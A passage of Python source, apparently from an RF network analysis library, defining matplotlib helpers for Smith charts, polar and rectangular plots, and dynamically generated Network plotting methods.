\"\"\"\n if funit.lower() == \"hz\":\n prefix = \" \"\n scale = 1\n elif len(funit) == 3:\n prefix = funit[0]\n scale = SI_CONVERSION[prefix]\n else:\n raise ValueError(f\"invalid funit {funit}\")\n ticks_x = ticker.FuncFormatter(lambda x, pos: f'{x * scale:g}')\n ax.xaxis.set_major_formatter(ticks_x)\n\n\ndef smith(smithR: Number = 1, chart_type: str = 'z', draw_labels: bool = False,\n border: bool = False, ax: Union[plt.Axes, None] = None, ref_imm: float = 1.0,\n draw_vswr: Union[List, bool, None] = None):\n \"\"\"\n Plot the Smith chart of a given radius.\n\n The Smith chart is used to assist in solving problems with transmission lines\n and matching circuits. It can be used to simultaneously display multiple\n parameters including impedances, admittances, reflection coefficients,\n scattering parameters, noise figure circles, etc. [#]_\n\n Parameters\n ----------\n smithR : number, optional\n radius of smith chart. Default is 1.\n chart_type : str, optional\n Contour type. Default is 'z'. 
Possible values are:\n\n * *'z'* : lines of constant impedance\n * *'y'* : lines of constant admittance\n * *'zy'* : lines of constant impedance stronger than admittance\n * *'yz'* : lines of constant admittance stronger than impedance\n draw_labels : Boolean, optional\n annotate real and imaginary parts of impedance on the\n chart (only if smithR=1).\n Default is False.\n border : Boolean, optional.\n draw a rectangular border with axis ticks, around the perimeter\n of the figure. Not used if draw_labels = True.\n Default is False.\n ax : :class:`matplotlib.pyplot.Axes` or None, optional\n existing axes to draw smith chart on.\n Default is None (creates a new figure)\n ref_imm : number, optional\n Reference immittance for center of Smith chart. Only changes\n labels, if printed.\n Default is 1.0.\n draw_vswr : list of numbers, Boolean or None, optional\n draw VSWR circles. If True, default values are used.\n Default is None.\n\n References\n ----------\n .. [#] https://en.wikipedia.org/wiki/Smith_chart\n\n \"\"\"\n ##TODO: fix this function so it doesnt suck\n if ax is None:\n ax1 = plt.gca()\n else:\n ax1 = ax\n\n # contour holds matplotlib instances of: pathes.Circle, and lines.Line2D, which\n # are the contours on the smith chart\n contour = []\n\n # these are hard-coded on purpose,as they should always be present\n rHeavyList = [0,1]\n xHeavyList = [1,-1]\n\n #TODO: fix this\n # these could be dynamically coded in the future, but work good'nuff for now\n if not draw_labels:\n rLightList = npy.logspace(3,-5,9,base=.5)\n xLightList = npy.hstack([npy.logspace(2,-5,8,base=.5), -1*npy.logspace(2,-5,8,base=.5)])\n else:\n rLightList = npy.array( [ 0.2, 0.5, 1.0, 2.0, 5.0 ] )\n xLightList = npy.array( [ 0.2, 0.5, 1.0, 2.0 , 5.0, -0.2, -0.5, -1.0, -2.0, -5.0 ] )\n\n # vswr lines\n if isinstance(draw_vswr, (tuple,list)):\n vswrVeryLightList = draw_vswr\n elif draw_vswr is True:\n # use the default I like\n vswrVeryLightList = [1.5, 2.0, 3.0, 5.0]\n else:\n vswrVeryLightList = []\n\n # cheap way to make a ok-looking smith chart at larger than 1 radii\n if smithR > 1:\n rMax = (1.+smithR)/(1.-smithR)\n rLightList = npy.hstack([ npy.linspace(0,rMax,11) , rLightList ])\n\n if chart_type.startswith('y'):\n y_flip_sign = -1\n else:\n y_flip_sign = 1\n\n # draw impedance and/or admittance\n both_charts = chart_type in ('zy', 'yz')\n\n\n # loops through Verylight, Light and Heavy lists and draws circles using patches\n # for analysis of this see R.M. 
Weikles Microwave II notes (from uva)\n\n superLightColor = dict(ec='whitesmoke', fc='none')\n veryLightColor = dict(ec='lightgrey', fc='none')\n lightColor = dict(ec='grey', fc='none')\n heavyColor = dict(ec='black', fc='none')\n\n # vswr circles verylight\n for vswr in vswrVeryLightList:\n radius = (vswr-1.0) / (vswr+1.0)\n contour.append( Circle((0, 0), radius, **veryLightColor))\n\n # impedance/admittance circles\n for r in rLightList:\n center = (r/(1.+r)*y_flip_sign,0 )\n radius = 1./(1+r)\n if both_charts:\n contour.insert(0, Circle((-center[0], center[1]), radius, **superLightColor))\n contour.append(Circle(center, radius, **lightColor))\n for x in xLightList:\n center = (1*y_flip_sign,1./x)\n radius = 1./x\n if both_charts:\n contour.insert(0, Circle( (-center[0], center[1]), radius, **superLightColor))\n contour.append(Circle(center, radius, **lightColor))\n\n for r in rHeavyList:\n center = (r/(1.+r)*y_flip_sign,0 )\n radius = 1./(1+r)\n contour.append(Circle(center, radius, **heavyColor))\n for x in xHeavyList:\n center = (1*y_flip_sign,1./x)\n radius = 1./x\n contour.append(Circle(center, radius, **heavyColor))\n\n # clipping circle\n clipc = Circle( [0,0], smithR, ec='k',fc='None',visible=True)\n ax1.add_patch( clipc)\n\n #draw x and y axis\n ax1.axhline(0, color='k', lw=.1, clip_path=clipc)\n ax1.axvline(1*y_flip_sign, color='k', clip_path=clipc)\n ax1.grid(0)\n # Set axis limits by plotting white points so zooming works properly\n ax1.plot(smithR*npy.array([-1.1, 1.1]), smithR*npy.array([-1.1, 1.1]), 'w.', markersize = 0)\n ax1.axis('image') # Combination of 'equal' and 'tight'\n\n\n if not border:\n ax1.yaxis.set_ticks([])\n ax1.xaxis.set_ticks([])\n for loc, spine in ax1.spines.items():\n spine.set_color('none')\n\n\n if draw_labels:\n #Clear axis\n ax1.yaxis.set_ticks([])\n ax1.xaxis.set_ticks([])\n for loc, spine in ax1.spines.items():\n spine.set_color('none')\n\n # Make annotations only if the radius is 1\n if smithR == 1:\n #Make room for annotation\n ax1.plot(npy.array([-1.25, 1.25]), npy.array([-1.1, 1.1]), 'w.', markersize = 0)\n ax1.axis('image')\n\n #Annotate real part\n for value in rLightList:\n # Set radius of real part's label; offset slightly left (Z\n # chart, y_flip_sign == 1) or right (Y chart, y_flip_sign == -1)\n # so label doesn't overlap chart's circles\n rho = (value - 1)/(value + 1) - y_flip_sign*0.01\n if y_flip_sign == 1:\n halignstyle = \"right\"\n else:\n halignstyle = \"left\"\n if y_flip_sign == -1: # 'y' and 'yz' charts\n value = 1/value\n ax1.annotate(str(value*ref_imm), xy=(rho*smithR, 0.01),\n xytext=(rho*smithR, 0.01), ha = halignstyle, va = \"baseline\")\n\n #Annotate imaginary part\n radialScaleFactor = 1.01 # Scale radius of label position by this\n # factor. 
Making it >1 places the label\n # outside the Smith chart's circle\n for value in xLightList:\n #Transforms from complex to cartesian\n S = (1j*value - 1) / (1j*value + 1)\n S *= smithR * radialScaleFactor\n rhox = S.real\n rhoy = S.imag * y_flip_sign\n\n # Choose alignment anchor point based on label's value\n if ((value == 1.0) or (value == -1.0)):\n halignstyle = \"center\"\n elif (rhox < 0.0):\n halignstyle = \"right\"\n else:\n halignstyle = \"left\"\n\n if (rhoy < 0):\n valignstyle = \"top\"\n else:\n valignstyle = \"bottom\"\n if y_flip_sign == -1: # 'y' and 'yz' charts\n value = 1/value\n #Annotate value\n ax1.annotate(str(value*ref_imm) + 'j', xy=(rhox, rhoy),\n xytext=(rhox, rhoy), ha = halignstyle, va = valignstyle)\n\n #Annotate 0 and inf\n if y_flip_sign == 1: # z and zy charts\n label_left, label_right = '0.0', r'$\\infty$'\n else: # y and yz charts\n label_left, label_right = r'$\\infty$', '0.0'\n ax1.annotate(label_left, xy=(-1.02, 0), xytext=(-1.02, 0),\n ha = \"right\", va = \"center\")\n ax1.annotate(label_right, xy=(radialScaleFactor, 0), xytext=(radialScaleFactor, 0),\n ha = \"left\", va = \"center\")\n\n # annotate vswr circles\n for vswr in vswrVeryLightList:\n rhoy = (vswr-1.0) / (vswr+1.0)\n\n ax1.annotate(str(vswr), xy=(0, rhoy*smithR),\n xytext=(0, rhoy*smithR), ha=\"center\", va=\"bottom\",\n color='grey', size='smaller')\n\n # loop though contours and draw them on the given axes\n for currentContour in contour:\n cc=ax1.add_patch(currentContour)\n cc.set_clip_path(clipc)\n\n\ndef plot_rectangular(x: NumberLike, y: NumberLike,\n x_label: Union[str, None] = None, y_label: Union[str, None] = None,\n title: Union[str, None] = None, show_legend: bool = True,\n axis: str = 'tight', ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot rectangular data and optionally label axes.\n\n Parameters\n ----------\n x : array-like, of complex data\n data to plot\n y : array-like, of complex data\n data to plot\n x_label : string or None, optional.\n x-axis label. Default is None.\n y_label : string or None, optional.\n y-axis label. Default is None.\n title : string or None, optional.\n plot title. Default is None.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n axis : str, optional\n whether or not to autoscale the axis. Default is 'tight'\n ax : :class:`matplotlib.axes.AxesSubplot` object or None, optional.\n axes to draw on. Default is None (creates a new figure)\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n \"\"\"\n if ax is None:\n ax = plt.gca()\n\n my_plot = ax.plot(x, y, *args, **kwargs)\n\n if x_label is not None:\n ax.set_xlabel(x_label)\n\n if y_label is not None:\n ax.set_ylabel(y_label)\n\n if title is not None:\n ax.set_title(title)\n\n if show_legend:\n # only show legend if they provide a label\n if 'label' in kwargs:\n ax.legend()\n\n if axis is not None:\n ax.autoscale(True, 'x', True)\n ax.autoscale(True, 'y', False)\n\n if plt.isinteractive():\n plt.draw()\n\n return my_plot\n\n\ndef plot_polar(theta: NumberLike, r: NumberLike,\n x_label: Union[str, None] = None, y_label: Union[str, None] = None,\n title: Union[str, None] = None, show_legend: bool = True,\n axis_equal: bool = False, ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot polar data on a polar plot and optionally label axes.\n\n Parameters\n ----------\n theta : array-like\n angular data to plot\n r : array-like\n radial data to plot\n x_label : string or None, optional\n x-axis label. 
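# A quick numerical check of the circle geometry used by smith() above: a
# constant-resistance contour r maps, in the reflection-coefficient plane,
# to a circle centred at (r/(1+r), 0) with radius 1/(1+r); likewise a VSWR
# circle has radius (vswr - 1)/(vswr + 1).
import numpy as npy

r = 0.5
center, radius = r / (1 + r), 1 / (1 + r)
for x in npy.linspace(-10.0, 10.0, 9):         # sweep reactance along the contour
    rho = (r + 1j * x - 1) / (r + 1j * x + 1)  # reflection coefficient of z = r + jx
    assert abs(abs(rho - center) - radius) < 1e-12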
Default is None.\n y_label : string or None, optional.\n y-axis label. Default is None\n title : string or None, optional.\n plot title. Default is None.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure).\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n --------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n\n \"\"\"\n if ax is None:\n # no Axes passed\n # if an existing (polar) plot is already present, grab and use its Axes\n # otherwise, create a new polar plot and use that Axes\n if not plt.get_fignums() or not plt.gcf().axes or plt.gca().name != 'polar':\n ax = plt.figure().add_subplot(projection='polar')\n else:\n ax = plt.gca()\n else:\n if ax.name != 'polar':\n # The projection of an existing axes can't be changed,\n # since specifying a projection when creating an axes determines the\n # axes class you get, which is different for each projection type.\n # So, passing a axe projection not polar is probably undesired\n warnings.warn(\n f\"Projection of the Axes passed as `ax` is not 'polar' but is {ax.name}.\" +\n \"See Matplotlib documentation to create a polar plot or call this function without the `ax` parameter.\"\n )\n\n ax.plot(theta, r, *args, **kwargs)\n\n if x_label is not None:\n ax.set_xlabel(x_label)\n\n if y_label is not None:\n ax.set_ylabel(y_label)\n\n if title is not None:\n ax.set_title(title)\n\n if show_legend:\n # only show legend if they provide a label\n if 'label' in kwargs:\n ax.legend()\n\n if axis_equal:\n ax.axis('equal')\n\n if plt.isinteractive():\n plt.draw()\n\n\ndef plot_complex_rectangular(z: NumberLike,\n x_label: str = 'Real', y_label: str = 'Imag',\n title: str = 'Complex Plane', show_legend: bool = True,\n axis: str = 'equal', ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot complex data on the complex plane.\n\n Parameters\n ----------\n z : array-like, of complex data\n data to plot\n x_label : string, optional.\n x-axis label. Default is 'Real'.\n y_label : string, optional.\n y-axis label. Default is 'Imag'.\n title : string, optional.\n plot title. Default is 'Complex Plane'\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. 
Default is None (creates a new figure)\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n --------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n\n \"\"\"\n x = npy.real(z)\n y = npy.imag(z)\n plot_rectangular(x=x, y=y, x_label=x_label, y_label=y_label,\n title=title, show_legend=show_legend, axis=axis,\n ax=ax, *args, **kwargs)\n\n\ndef plot_complex_polar(z: NumberLike,\n x_label: Union[str, None] = None, y_label: Union[str, None] = None,\n title: Union[str, None] = None, show_legend: bool = True,\n axis_equal: bool = False, ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot complex data in polar format.\n\n Parameters\n ----------\n z : array-like, of complex data\n data to plot\n x_label : string or None, optional\n x-axis label. Default is None.\n y_label : string or None, optional.\n y-axis label. Default is None\n title : string or None, optional.\n plot title. Default is None.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure).\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n --------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n \"\"\"\n theta = npy.angle(z)\n r = npy.abs(z)\n plot_polar(theta=theta, r=r, x_label=x_label, y_label=y_label,\n title=title, show_legend=show_legend, axis_equal=axis_equal,\n ax=ax, *args, **kwargs)\n\n\ndef plot_smith(s: NumberLike, smith_r: float = 1, chart_type: str = 'z',\n x_label: str = 'Real', y_label: str = 'Imaginary', title: str = 'Complex Plane',\n show_legend: bool = True, axis: str = 'equal', ax: Union[plt.Axes, None] = None,\n force_chart: bool = False, draw_vswr: Union[List, bool, None] = None, draw_labels: bool = False,\n *args, **kwargs):\n r\"\"\"\n Plot complex data on smith chart.\n\n Parameters\n ------------\n s : complex array-like\n reflection-coefficient-like data to plot\n smith_r : number\n radius of smith chart\n chart_type : str in ['z','y']\n Contour type for chart.\n * *'z'* : lines of constant impedance\n * *'y'* : lines of constant admittance\n x_label : string, optional.\n x-axis label. Default is 'Real'.\n y_label : string, optional.\n y-axis label. Default is 'Imaginary'\n title : string, optional.\n plot title, Default is 'Complex Plane'.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n axis_equal: Boolean, optional.\n sets axis to be equal increments. Default is 'equal'.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure).\n force_chart : Boolean, optional.\n forces the re-drawing of smith chart. Default is False.\n draw_vswr : list of numbers, Boolean or None, optional\n draw VSWR circles. 
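# The complex-to-polar split performed by plot_complex_polar() above, shown
# on a toy array; matplotlib polar axes consume (theta, r) pairs.
import numpy as npy

z = npy.array([1 + 1j, -2j, 3])
theta, r = npy.angle(z), npy.abs(z)
print(theta)   # [ 0.78539816 -1.57079633  0.        ]
print(r)       # [1.41421356 2.         3.        ]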
If True, default values are used.\n Default is None.\n draw_labels : Boolean\n annotate chart with impedance values\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n ----------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n # test if smith chart is already drawn\n if not force_chart:\n if len(ax.patches) == 0:\n smith(ax=ax, smithR = smith_r, chart_type=chart_type, draw_vswr=draw_vswr, draw_labels=draw_labels)\n\n plot_complex_rectangular(s, x_label=x_label, y_label=y_label,\n title=title, show_legend=show_legend, axis=axis,\n ax=ax, *args, **kwargs)\n\n ax.axis(smith_r*npy.array([-1.1, 1.1, -1.1, 1.1]))\n if plt.isinteractive():\n plt.draw()\n\n\ndef subplot_params(ntwk, param: str = 's', proj: str = 'db',\n size_per_port: int = 4, newfig: bool = True,\n add_titles: bool = True, keep_it_tight: bool = True,\n subplot_kw: dict = {},\n *args, **kw):\n \"\"\"\n Plot all networks parameters individually on subplots.\n\n Parameters\n ----------\n ntwk : :class:`~skrf.network.Network`\n Network to get data from.\n param : str, optional\n Parameter to plot, by default 's'\n proj : str, optional\n Projection type, by default 'db'\n size_per_port : int, optional\n by default 4\n newfig : bool, optional\n by default True\n add_titles : bool, optional\n by default True\n keep_it_tight : bool, optional\n by default True\n subplot_kw : dict, optional\n by default {}\n\n Returns\n -------\n f : :class:`matplotlib.pyplot.Figure`\n Matplotlib Figure\n ax : :class:`matplotlib.pyplot.Axes`\n Matplotlib Axes\n\n \"\"\"\n if newfig:\n f,axs= plt.subplots(ntwk.nports,ntwk.nports,\n figsize =(size_per_port*ntwk.nports,\n size_per_port*ntwk.nports ),\n **subplot_kw)\n else:\n f = plt.gcf()\n axs = npy.array(f.get_axes())\n\n for ports,ax in zip(ntwk.port_tuples, axs.flatten()):\n plot_func = ntwk.__getattribute__('plot_%s_%s'%(param, proj))\n plot_func(m=ports[0], n=ports[1], ax=ax,*args, **kw)\n if add_titles:\n ax.set_title('%s%i%i'%(param.upper(),ports[0]+1, ports[1]+1))\n if keep_it_tight:\n plt.tight_layout()\n return f, axs\n\n\ndef shade_bands(edges: NumberLike, y_range: Union[Tuple, None] = None,\n cmap: str = 'prism', **kwargs):\n r\"\"\"\n Shades frequency bands.\n\n When plotting data over a set of frequency bands it is nice to\n have each band visually separated from the other. The kwarg `alpha`\n is useful.\n\n Parameters\n ----------\n edges : array-like\n x-values separating regions of a given shade\n y_range : tuple or None, optional.\n y-values to shade in. 
Default is None.\n cmap : str, optional.\n see matplotlib.cm or matplotlib.colormaps for acceptable values.\n Default is 'prism'.\n \\*\\*kwargs : key word arguments\n passed to `matplotlib.fill_between`\n\n Examples\n --------\n >>> rf.shade_bands([325,500,750,1100], alpha=.2)\n \"\"\"\n cmap = plt.cm.get_cmap(cmap)\n if not isinstance(y_range, (tuple, list)) or (len(y_range) != 2):\n y_range=plt.gca().get_ylim()\n axis = plt.axis()\n for k in range(len(edges)-1):\n plt.fill_between(\n [edges[k],edges[k+1]],\n y_range[0], y_range[1],\n color = cmap(1.0*k/len(edges)),\n **kwargs)\n plt.axis(axis)\n\n\ndef save_all_figs(dir: str = './', format: Union[None, List[str]] = None,\n replace_spaces: bool = True, echo: bool = True):\n \"\"\"\n Save all open Figures to disk.\n\n Parameters\n ----------\n dir : string, optional.\n path to save figures into. Default is './'\n format : None or list of strings, optional.\n the types of formats to save figures as. The elements of this\n list are passed to :func:`matplotlib.pyplot.savefig`. This is a list so that\n you can save each figure in multiple formats. Default is None.\n replace_spaces : bool, optional\n default is True.\n echo : bool, optional.\n True prints filenames as they are saved. Default is True.\n \"\"\"\n if dir[-1] != '/':\n dir = dir + '/'\n for fignum in plt.get_fignums():\n fileName = plt.figure(fignum).get_axes()[0].get_title()\n if replace_spaces:\n fileName = fileName.replace(' ','_')\n if fileName == '':\n fileName = 'unnamedPlot'\n if format is None:\n plt.savefig(dir+fileName)\n if echo:\n print(dir+fileName)\n else:\n for fmt in format:\n plt.savefig(dir+fileName+'.'+fmt, format=fmt)\n if echo:\n print(dir+fileName+'.'+fmt)\nsaf = save_all_figs\n\n\ndef add_markers_to_lines(ax: Union[plt.Axes, None] = None,\n marker_list: List = ['o', 'D', 's', '+', 'x'],\n markevery: int = 10):\n \"\"\"\n Add markers to existing lings on a plot.\n\n Convenient if you have already have a plot made, but then\n need to add markers afterwards, so that it can be interpreted in\n black and white. The markevery argument makes the markers less\n frequent than the data, which is generally what you want.\n\n Parameters\n ----------\n ax : matplotlib.Axes or None, optional\n axis which to add markers to.\n Default is current axe gca()\n marker_list : list of string, optional\n list of marker characters. Default is ['o', 'D', 's', '+', 'x'].\n see matplotlib.plot help for possible marker characters\n markevery : int, optional.\n markevery number of points with a marker.\n Default is 10.\n\n \"\"\"\n if ax is None:\n ax=plt.gca()\n lines = ax.get_lines()\n if len(lines) > len (marker_list ):\n marker_list *= 3\n [k[0].set_marker(k[1]) for k in zip(lines, marker_list)]\n [line.set_markevery(markevery) for line in lines]\n\n\ndef legend_off(ax: Union[plt.Axes, None] = None):\n \"\"\"\n Turn off the legend for a given axes.\n\n If no axes is given then it will use current axes.\n\n Parameters\n ----------\n ax : matplotlib.Axes or None, optional\n axis to operate on.\n Default is None for current axe gca()\n \"\"\"\n if ax is None:\n plt.gca().legend_.set_visible(0)\n else:\n ax.legend_.set_visible(0)\n\n\ndef scrape_legend(n: Union[int, None] = None,\n ax: Union[plt.Axes, None] = None):\n \"\"\"\n Scrape a legend with redundant labels.\n\n Given a legend of m entries of n groups, this will remove all but\n every m/nth entry. 
This is used when you plot many lines representing\n the same thing, and only want one label entry in the legend for the\n whole ensemble of lines.\n\n Parameters\n ----------\n n : int or None, optional.\n Default is None.\n ax : matplotlib.Axes or None, optional\n axis to operate on.\n Default is None for current axe gca()\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n handles, labels = ax.get_legend_handles_labels()\n\n if n is None:\n n =len ( set(labels))\n\n if n>len(handles):\n raise ValueError('number of entries is too large')\n\n k_list = [int(k) for k in npy.linspace(0,len(handles)-1,n)]\n ax.legend([handles[k] for k in k_list], [labels[k] for k in k_list])\n\n\ndef func_on_all_figs(func: Callable, *args, **kwargs):\n r\"\"\"\n Run a function after making all open figures current.\n\n Useful if you need to change the properties of many open figures\n at once, like turn off the grid.\n\n Parameters\n ----------\n func : function\n function to call\n \\*args, \\*\\*kwargs : passed to func\n\n Examples\n --------\n >>> rf.func_on_all_figs(grid, alpha=.3)\n \"\"\"\n for fig_n in plt.get_fignums():\n fig = plt.figure(fig_n)\n for ax_n in fig.axes:\n fig.add_axes(ax_n) # trick to make axes current\n func(*args, **kwargs)\n plt.draw()\n\nfoaf = func_on_all_figs\n\n\ndef plot_vector(a: complex, off: complex = 0+0j, *args, **kwargs):\n \"\"\"\n Plot a 2d vector.\n\n Parameters\n ----------\n a : complex\n complex coordinates (real for X, imag for Y) of the arrow location.\n off : complex, optional\n complex direction (real for U, imag for V) components\n of the arrow vectors, by default 0+0j\n\n Returns\n -------\n quiver : matplotlib.pyplot.quiver\n \"\"\"\n return quiver(off.real, off.imag, a.real, a.imag, scale_units='xy',\n angles='xy', scale=1, *args, **kwargs)\n\n\ndef colors() -> List[str]:\n \"\"\"\n Return the list of colors of the rcParams color cycle.\n\n Returns\n -------\n colors : List[str]\n \"\"\"\n return [c['color'] for c in rcParams['axes.prop_cycle']]\n\n\nPRIMARY_PROPERTIES = network.PRIMARY_PROPERTIES\nCOMPONENT_FUNC_DICT = network.COMPONENT_FUNC_DICT\nY_LABEL_DICT = network.Y_LABEL_DICT\n\n\n# TODO: remove this as it takes up ~70% cpu time of this init\ndef setup_matplotlib_plotting():\n frequency.Frequency.labelXAxis = labelXAxis\n frequency.Frequency.plot = plot_v_frequency\n\n __generate_plot_functions(network.Network)\n network.Network.plot = plot\n network.Network.plot_passivity = plot_passivity\n network.Network.plot_reciprocity = plot_reciprocity\n network.Network.plot_reciprocity2 = plot_reciprocity2\n network.Network.plot_s_db_time = plot_s_db_time\n network.Network.plot_s_smith = plot_s_smith\n network.Network.plot_it_all = plot_it_all\n\n calibration.Calibration.plot_errors = plot_calibration_errors\n calibration.Calibration.plot_caled_ntwks = plot_caled_ntwks\n calibration.Calibration.plot_residuals = plot_residuals\n\n networkSet.NetworkSet.animate = animate\n networkSet.NetworkSet.plot_uncertainty_bounds_component = plot_uncertainty_bounds_component\n networkSet.NetworkSet.plot_minmax_bounds_component = plot_minmax_bounds_component\n networkSet.NetworkSet.plot_uncertainty_bounds_s_db = plot_uncertainty_bounds_s_db\n networkSet.NetworkSet.plot_minmax_bounds_s_db = plot_minmax_bounds_s_db\n networkSet.NetworkSet.plot_minmax_bounds_s_db10 = plot_minmax_bounds_s_db10\n networkSet.NetworkSet.plot_uncertainty_bounds_s_time_db = plot_uncertainty_bounds_s_time_db\n networkSet.NetworkSet.plot_minmax_bounds_s_time_db = plot_minmax_bounds_s_time_db\n 
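# The index thinning performed by scrape_legend() above: n evenly spaced picks
# out of the m legend handles via npy.linspace; plain strings stand in for
# real matplotlib handles here.
import numpy as npy

handles = list('abcdefgh')
n = 2
k_list = [int(k) for k in npy.linspace(0, len(handles) - 1, n)]
print([handles[k] for k in k_list])   # -> ['a', 'h']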
networkSet.NetworkSet.plot_uncertainty_decomposition = plot_uncertainty_decomposition\n networkSet.NetworkSet.plot_uncertainty_bounds_s = plot_uncertainty_bounds_s\n networkSet.NetworkSet.plot_logsigma = plot_logsigma\n networkSet.NetworkSet.signature = signature\n\n circuit.Circuit.plot_graph = plot_circuit_graph\n\ndef __generate_plot_functions(self):\n \"\"\"\n \"\"\"\n for prop_name in PRIMARY_PROPERTIES:\n\n def plot_prop_polar(self,\n m=None, n=None, ax=None,\n show_legend=True, prop_name=prop_name, *args, **kwargs):\n\n # create index lists, if not provided by user\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n gen_label = True\n else:\n gen_label = False\n\n # was_interactive = plt.isinteractive\n # if was_interactive:\n # plt.interactive(False)\n\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks\n # name if it exists, and they didn't pass a name key in\n # the kwargs\n if gen_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = '%s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = self.name+', %s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n kwargs['label'] = label_string\n\n # plot the desired attribute vs frequency\n plot_complex_polar(\n z = getattr(self,prop_name)[:,m,n],\n show_legend = show_legend, ax = ax,\n *args, **kwargs)\n\n # if was_interactive:\n # plt.interactive(True)\n # plt.draw()\n # plt.show()\n\n plot_prop_polar.__doc__ = r\"\"\"\nPlot the Network attribute :attr:`{}` vs frequency.\n\nParameters\n----------\nm : int, optional\n first index of s-parameter matrix, if None will use all\nn : int, optional\n second index of the s-parameter matrix, if None will use all\nax : :class:`matplotlib.Axes` object, optional\n An existing Axes object to plot on\nshow_legend : Boolean\n draw legend or not\nattribute : string\n Network attribute to plot\ny_label : string, optional\n the y-axis label\n\n\\*args,\\**kwargs : arguments, keyword arguments\n passed to :func:`matplotlib.plot`\n\nNote\n----\nThis function is dynamically generated upon Network\ninitialization. 
This is accomplished by calling\n:func:`plot_vs_frequency_generic`\n\nExamples\n--------\n>>> myntwk.plot_{}(m=1,n=0,color='r')\n\"\"\".format(prop_name, prop_name)\n # setattr(self.__class__,'plot_%s_polar'%(prop_name), \\\n setattr(self, 'plot_%s_polar'%(prop_name), plot_prop_polar)\n\n def plot_prop_rect(self,\n m=None, n=None, ax=None,\n show_legend=True, prop_name=prop_name, *args, **kwargs):\n\n # create index lists, if not provided by user\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n gen_label = True\n else:\n gen_label = False\n\n #was_interactive = plt.isinteractive\n #if was_interactive:\n # plt.interactive(False)\n\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks\n # name if it exists, and they didn't pass a name key in\n # the kwargs\n if gen_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = '%s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = self.name+', %s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n kwargs['label'] = label_string\n\n # plot the desired attribute vs frequency\n plot_complex_rectangular(\n z=getattr(self, prop_name)[:, m, n],\n show_legend=show_legend, ax=ax,\n *args, **kwargs)\n\n #if was_interactive:\n # plt.interactive(True)\n # plt.draw()\n # plt.show()\n\n plot_prop_rect.__doc__ = r\"\"\"\nPlot the Network attribute :attr:`{}` vs frequency.\n\nParameters\n----------\nm : int, optional\n first index of s-parameter matrix, if None will use all\nn : int, optional\n second index of the s-parameter matrix, if None will use all\nax : :class:`matplotlib.Axes` object, optional\n An existing Axes object to plot on\nshow_legend : Boolean\n draw legend or not\nattribute : string\n Network attribute to plot\ny_label : string, optional\n the y-axis label\n\n\\*args,\\**kwargs : arguments, keyword arguments\n passed to :func:`matplotlib.plot`\n\nNote\n----\nThis function is dynamically generated upon Network\ninitialization. 
